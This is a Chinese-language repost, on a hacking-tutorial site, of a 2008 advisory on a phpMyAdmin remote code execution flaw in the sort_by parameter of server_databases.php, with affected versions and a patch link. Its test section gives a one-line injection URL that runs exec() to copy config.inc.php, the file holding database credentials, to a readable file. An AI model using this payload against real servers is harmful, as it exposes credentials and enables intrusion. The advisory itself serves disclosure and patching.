phpMyAdmin sort_by参数远程代码执行漏洞 - 打造国内专业网络安全动画技术交流站点---黑客动画$黑客教程$安全培训$黑软下载$黑客动画教程$黑客软件$黑客工具$菜鸟入门

首页 ┆ 文章中心 ┆ 黑客工具 ┆ 黑吧学院 ┆ 技术论坛 ┆ 安全培训 ┆ 免费频道 ┆ 最近更新 ┆ 瑞星在线杀毒 ┆ 黑吧百度 ┆ 繁體中文


			设为首页加入收藏发布作品

入侵检测 | IM安全 | 远程控制 | 破解加密 | 综合教程 | 安全软件 | 常用工具 | 会员区 | 视频教程 | 一日一教

资讯中心 | 漏洞公告 | 入侵检测 | 网络技巧 | 安全防护 | 操作系统 | 免费资源

　

　

栏目导航

· 漏洞利用	· 脚本注入
· 入侵实例	· 编程代码
· 逆向工程

热门文章

· 如何封别人QQ
· 充QQ币的疯狂——宽...
· 免费得QB
· 400秒远程攻破你的Q...
· [图文] QQ免费建400个群
· [组图] 给你一台永远不关机...
· [注意] QQ宠物砸蛋秘诀
· 再次有机会免费获得...
· 想的挂QQvip的进
· 在QQ中将自己从对方...

相关文章

· phpMyAdmin 后台拿w...
· 利用phpMyAdmin拿we...
· phpMyAdmin $_REQUE...
· phpmyadmin爆路径
· phpmyadmin爆路径
· phpMyAdmin 后台拿w...
· [新闻] phpMyAdmin多个HTTP...
· phpMyAdmin安装及配...
· Linux下PhpMyAdmin程...
· PHPMyAdmin上出现严...

phpMyAdmin sort_by参数远程代码执行漏洞

作者：佚名来源：转载发布时间：2008-9-20 1:28:57 发布人：黑客动画吧

减小字体增大字体

发布日期：2008-09-15
更新日期：2008-09-17

受影响系统：

phpMyAdmin phpMyAdmin < 2.11.9.1

不受影响系统：

phpMyAdmin phpMyAdmin 2.11.9.1

描述：BUGTRAQ ID: 31188

phpMyAdmin是用PHP编写的工具，用于通过WEB管理MySQL。

phpMyAdmin的server_databases.php脚本没有正确地过滤对sort_by参数的输入，远程攻击者可以通过提交恶意请求注入并执行任意PHP代码。

<*来源：Norman Hippert

链接：http://secunia.com/advisories/31884
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2008-7
http://fd.the-wildcat.de/pma_e36a091q11.php
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]

建议：厂商补丁：

phpMyAdmin
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://cache.gmane.org//gmane/comp/security/oss/general/947-001.bin

from:http://www.nsfocus.net/vulndb/12387

[ ] [返回上一页] [打印] [收藏]

上一篇文章：Session Fixation 攻防实战

下一篇文章：吉林电视台网站遭黑客挂马相关部门已介入调查

　

关于本站 - 网站帮助 - 广告合作 - 下载声明 - 网站导航 - 作品发布

互联网备案登记:粤ICP备05008775号
友情提示：浏览本站，请使用IE6.0浏览，并将分辩率设置为1024*768 为佳
Copyright © 2002-2005 Hack58.Com. All Rights Reserved .